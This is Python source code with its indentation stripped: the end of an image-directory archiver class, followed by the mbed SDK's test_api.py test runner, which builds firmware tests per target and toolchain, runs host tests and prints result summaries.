"""
self.logger.info("Stopping archiving.")
self._stop = True
if blocking:
for thread in self._threads:
with suppress(RuntimeError):
thread.join()
def _async_monitor_status(self):
""" Report the status on a regular interval. """
self.logger.debug("Starting status thread.")
while True:
if self._stop:
self.logger.debug("Stopping status thread.")
break
# Get the current status
status = self.status
self.logger.trace(f"Archiver status: {status}")
if not self.is_running:
self.logger.warning(f"Archiver is not running.")
# Sleep before reporting status again
time.sleep(self._status_interval)
def _async_watch_directory(self):
""" Watch the images directory and add all valid files to the archive queue. """
self.logger.debug("Starting watch thread.")
while True:
if self._stop:
self.logger.debug("Stopping watch thread.")
break
# Loop over filenames and add them to the queue
# Duplicates are taken care of later on
for filename in self._get_filenames_to_archive():
self._archive_queue.put([current_time(), filename])
# Sleep before checking again
time.sleep(self.sleep_interval.to_value(u.second))
def _async_archive_files(self, sleep=10):
""" Archive files that have been in the queue longer than self.delay_interval.
Args:
sleep (float, optional): Sleep for this long while waiting for self.delay_interval to
expire. Default: 10s.
"""
while True:
if self._stop and self._archive_queue.empty():
self.logger.debug("Stopping archive thread.")
break
# Get the oldest file from the queue
try:
track_time, filename = self._archive_queue.get(block=True, timeout=sleep)
except queue.Empty:
continue
# Archive file when it is old enough
while current_time() - track_time < self.delay_interval:
time.sleep(sleep)
with suppress(FileNotFoundError):
self._archive_file(filename)
self._n_archived += 1
# Tell the queue we are done with this file
self._archive_queue.task_done()
def _get_filenames_to_archive(self):
""" Get valid filenames in the images directory to archive.
Returns:
list: The list of filenames to archive.
"""
filenames = []
# Get all the matching filenames in the images directory
for path, _, files in os.walk(self.images_directory):
for name in files:
if any([name.endswith(ext) for ext in self._valid_extensions]):
filenames.append(os.path.join(path, name))
return filenames
def _get_archive_filename(self, filename):
""" Get the archive filename from the original filename.
Args:
filename (str): The filename string.
Returns:
str: The archived file name.
"""
relpath = os.path.relpath(filename, self.images_directory)
return os.path.join(self.archive_directory, relpath)
def _archive_file(self, filename):
""" Archive the file.
Args:
filename (str): The filename string.
"""
if not os.path.exists(filename): # May have already been archived or deleted
self.logger.trace(f"Tried to archive {filename} but it does not exist.")
raise FileNotFoundError
# Get the archived filename
archive_filename = self._get_archive_filename(filename)
# Make sure the archive directory exists
os.makedirs(os.path.dirname(archive_filename), exist_ok=True)
# Move the file to the archive directory
self.logger.trace(f"Moving {filename} to {archive_filename}.")
shutil.move(filename, archive_filename)
|
test_api.py | """
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.utils import get_path_depth
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description())
except Exception, e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
